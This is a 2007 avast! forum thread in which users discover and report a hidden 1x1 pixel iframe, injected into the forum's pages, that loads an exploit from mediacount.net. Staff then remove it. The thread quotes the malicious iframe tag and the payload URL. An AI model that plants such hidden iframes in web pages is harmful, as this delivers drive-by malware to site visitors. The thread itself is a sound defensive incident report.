Author Topic: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?  (Read 23349 times)

0 Members and 1 Guest are viewing this topic.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
I have been experiencing problem posting replies to topics in that the instead of the topic being displayed with the new pot added it hangs in mid post or that is what it appears to do. If I go back and refresh the topic I can see the post I added.

When this hang happens I saw a 1 pixel square at the top left of the screen and it would appear that there is another script running form mediacount, in the forum of an iFrame 1 pixel X 1 pixel. I had noticed this square in previous pages but didn't twig what it was.

Code: [Select]
<iframe src='http://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>I don't know what the consequences of placing an iFrame outside of the body/head of a wc3 standard page would be.

This I believe is happening because I have noscript and firefox, and becake this is a new addition to avast pages, I have only allowed avast.com and google-analytics.com and not mediacount.net. It took ages to find this and trying to ad mediacount.net is proving to be difficult.

Is anyone else experiencing this problem or noticing the 1 pixel square at the top left of pages ?

So what is avast using mediacount.net for and why use an iFrame tag, which is notorious for introducing malware into systems as it can run scripts with user input ?
This use of an iFrame tag on what is a security based web site I feel is a big mistake.

Edit: Looks like this mention of the iframe and malware exploit proved to be very accurate (see images below).
« Last Edit: August 25, 2007, 01:04:30 AM by DavidR »
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
Re: What does the forum use mediacount.net for ?
« Reply #1 on: August 25, 2007, 12:00:36 AM »
This is what the screen looks like with the 1 pixel iFrame if experiencing this problem.

If the hang occurs the URL in the window is where it hangs.

Edit: The images I tried to attach failed because the malware iframe screwed with the attachments and they don't display so I have removed 1-pixel.gif and 1-pixel-hang.gif to avoid anyone trying to load them.
« Last Edit: August 25, 2007, 02:27:07 AM by DavidR »
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
Re: What does the forum use mediacount.net for ?
« Reply #2 on: August 25, 2007, 12:10:26 AM »
There also seems to be a further problem in that the attached images don't display either.

So since this mediacount.net iFrame it has screwed my forum use with the Babylon theme, making it almost impossible to use the forum not knowing if the post was successful. Not very useful when you post about 20 posts a day.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
Re: What does the forum use mediacount.net for ?
« Reply #3 on: August 25, 2007, 12:25:03 AM »
Test, with NoScript disabled.

Edit: absolutely no change with NoScript disabled. I have no idea what is going on since this iFrame for mediacount.net has been added but it totally screws me up.
« Last Edit: August 25, 2007, 12:27:05 AM by DavidR »
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
Re: What does the forum use mediacount.net for ?
« Reply #4 on: August 25, 2007, 12:58:03 AM »
Well I guess I found out a little more it would appear that the iFrame is a malware infestation on the forums, I wondered why it was lonely on the forums.



This is the link the iFrame goes to and DrWeb link scanner reports Exploit.ANIFile
http[break]://[break] mediacount.net/strong/020sdsfg/324123.htm

Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
Wow, its lonely on here, I have just looked at the recent posts and I'm the only one soldiering on  with 10 out of the last 12 posts since 6 p.m. UK local time.

I have reported the forum as infected to virus @ avast . com lets hope it is resolved quickly.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 65983
Seems it's working now... testing...
Edited: the page does not come back to the same topic but to an empty page... strange. Look at the active tab in Firefox...
« Last Edit: August 25, 2007, 03:14:34 AM by Tech™ »
The best things in life are free.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 65983
I can't quote...
The page does not come back to the original thread but to a blank page...
The best things in life are free.

Offline StopMe

  • Super Poster
  • ***
  • Posts: 1200
I noticed the 1x1 pixel square whenever I log in. I had mediacount.net disabled by No-Script but when I disable No-Script, I still see the square as well.   :-\

Wilders are also talking about it here

Offline Tarq57

  • Avast Evangelist
  • Massive Poster
  • ***
  • Posts: 3696
  • If at first you don’t succeed; call it version 1.0
Well, I'm glad I read these posts. Have been unable to log on in Firefox, and when I attempt in IE7, Avast AV blocks the page from loading. Ironic.
Strange. Just noticed I am logged on. Just got a pixel before.
Also unable to modify profile.

WindowsXP Home SP3,Avast Free 5.1.889,Windows Firewall, Autorun Eater,Firefox w/Noscript+ /Adblock+/Better Privacy, IE8 all zones except MS Update set to "untrusted" settings,MVPS Host file.SecuniaPSI.

Offline kubecj

  • Avast team
  • Advanced Poster
  • *
  • Posts: 1125
    • ALWIL Software
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.

How would the person know I'm _far_ away from my computer?  ::)
Jindrich Kubec

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72304
  • No support PMs thanks
Firefox by all accounts isn't vulnerable to this attach by all accounts, even with noscript disabled, when I experienced page problem I checked the page source in trying to track the problem and saw the iframe tag. At first I just thought the forums was using it to gather page visited data, etc. and thought it a crazy method to do it.

However, when I tried using avant an IE clone web shield alerted. So I twigged the site had been infected, so I sent a report to avast.

These were the two images I tried to attach earlier that failed.

It would be interesting to know if this was purely a security failing of SMC 1.1.2 as I found several such issues on the Simple Machines forums and they were also using 1.1.2 but it seemed they also had a weakness in their webhosting service.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2015 10.3.2225 R3 SP1/ Outpost Firewall Pro9.1/ Firefox 39.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.1.8/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Online bob3160

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 28164
  • 55 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Here is what I got yesterday:


and most of today, I was greeted with the following:



Glad the forum is back but would like an explanation.  :)
« Last Edit: August 26, 2007, 12:59:27 AM by bob3160 »
Free avast! Security Seminar: http://www.authorstream.com/Presentation/bob3160-1425909-protecting-yourself/    -  Important: http://www.organdonor.gov/
My Blog: http://bob3160.blogspot.com/ - Win 8.1 Pro 64bit, 8 Gig Ram, avast!2015.10.2.2218 Free, MBAM, WinPatrol -- How to Successfully Install Avast http://goo.gl/VLXde

Offline news

  • Full Member
  • ***
  • Posts: 173
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.

How would the person know I'm _far_ away from my computer?  ::)

Well I'm glad you're close to your computer..now.   :)

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 65983
How would the person know I'm _far_ away from my computer?  ::)
Inside information? ;D
The best things in life are free.